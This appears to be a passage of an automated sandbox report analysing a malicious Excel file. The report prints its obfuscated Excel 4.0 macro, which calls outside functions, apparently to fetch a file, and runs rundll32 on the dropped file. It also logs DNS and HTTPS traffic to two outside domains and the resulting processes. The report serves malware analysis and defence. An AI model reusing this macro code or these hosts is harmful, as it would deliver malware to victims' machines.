                                                                                                                                                            Entropy:3.24802119785
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                            Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                            Macro 4.0 Code

                                                                                                                                                            CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                                                                                                            
                                                                                                                                                            ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                            "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                            "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                            Network Behavior

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            May 13, 2021 05:24:41.351135015 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:41.518717051 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:41.518835068 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:41.519984961 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:41.687397003 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:41.690928936 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:41.690951109 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:41.690959930 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:41.691028118 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:41.691065073 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:41.705142975 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:41.873081923 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:41.873156071 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:41.874222040 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:42.082297087 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:42.566852093 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:42.566989899 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:42.567091942 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:42.567146063 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:42.569273949 CEST49708443192.168.2.3108.167.180.130
                                                                                                                                                            May 13, 2021 05:24:42.638632059 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:42.739670992 CEST44349708108.167.180.130192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:42.817888975 CEST44349711208.91.198.131192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:42.818036079 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:42.818865061 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:42.997399092 CEST44349711208.91.198.131192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:43.000449896 CEST44349711208.91.198.131192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:43.000477076 CEST44349711208.91.198.131192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:43.000492096 CEST44349711208.91.198.131192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:43.000597954 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:43.000680923 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:43.013367891 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:43.192867994 CEST44349711208.91.198.131192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:43.193077087 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:43.194691896 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:43.403906107 CEST44349711208.91.198.131192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:43.587879896 CEST44349711208.91.198.131192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:43.588022947 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:43.588069916 CEST44349711208.91.198.131192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:43.588128090 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:43.588571072 CEST49711443192.168.2.3208.91.198.131
                                                                                                                                                            May 13, 2021 05:24:43.758317947 CEST44349711208.91.198.131192.168.2.3

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            May 13, 2021 05:24:21.470248938 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:21.488914013 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:21.625926018 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:21.677519083 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:22.823508024 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:22.876821041 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:26.279794931 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:26.331346035 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:27.500783920 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:27.552510977 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:27.705199957 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:27.766937971 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:34.689527035 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:34.748142958 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:36.056982040 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:36.147391081 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:36.740091085 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:36.812179089 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:37.743132114 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:37.800434113 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:37.997968912 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:38.046592951 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:38.758070946 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:38.846163988 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:40.774540901 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:40.831644058 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:41.294300079 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:41.345530987 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:41.487526894 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:41.544605017 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:42.526940107 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:42.579583883 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:42.587071896 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:42.635884047 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:43.553649902 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:43.602602959 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:44.807024956 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:44.855794907 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:48.298907042 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:48.347781897 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:50.789319038 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:50.838176012 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:51.866373062 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:51.915201902 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:52.783878088 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:52.840954065 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:54.343534946 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:54.392460108 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:55.252343893 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:55.303812027 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:56.715128899 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:56.763942957 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:56.939326048 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:57.000056028 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:57.646291971 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:57.694868088 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:24:58.594360113 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:24:58.643157959 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:25:02.685854912 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:25:02.743011951 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:25:16.822551966 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:25:16.879502058 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:25:27.006819010 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:25:27.066426992 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:26:01.198514938 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:26:01.277051926 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:26:04.677290916 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:26:04.735966921 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:26:11.749826908 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:26:11.808619022 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                            May 13, 2021 05:26:33.329333067 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                            May 13, 2021 05:26:33.394056082 CEST53612928.8.8.8192.168.2.3

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            May 13, 2021 05:24:41.294300079 CEST192.168.2.38.8.8.80x300Standard query (0)stateoftheartacademy.com.brA (IP address)IN (0x0001)
                                                                                                                                                            May 13, 2021 05:24:42.587071896 CEST192.168.2.38.8.8.80x6e29Standard query (0)dsafarm.comA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            May 13, 2021 05:24:41.345530987 CEST8.8.8.8192.168.2.30x300No error (0)stateoftheartacademy.com.br108.167.180.130A (IP address)IN (0x0001)
                                                                                                                                                            May 13, 2021 05:24:42.635884047 CEST8.8.8.8192.168.2.30x6e29No error (0)dsafarm.com208.91.198.131A (IP address)IN (0x0001)

                                                                                                                                                            HTTPS Packets

                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                            May 13, 2021 05:24:41.690959930 CEST108.167.180.130443192.168.2.349708CN=cpcontacts.stateoftheartacademy.com.br CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Feb 16 13:37:39 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon May 17 14:37:39 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                            May 13, 2021 05:24:43.000492096 CEST208.91.198.131443192.168.2.349711CN=autodiscover.premieregroup.co.in CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 29 13:33:30 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jul 28 13:33:30 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                            Code Manipulations

                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Start time:05:24:33
                                                                                                                                                            Start date:13/05/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                            Imagebase:0x1370000
                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:05:24:42
                                                                                                                                                            Start date:13/05/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                            Imagebase:0xcf0000
                                                                                                                                                            File size:61952 bytes
                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:05:24:43
                                                                                                                                                            Start date:13/05/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                            Imagebase:0xcf0000
                                                                                                                                                            File size:61952 bytes
                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis

                                                                                                                                                            Reset < >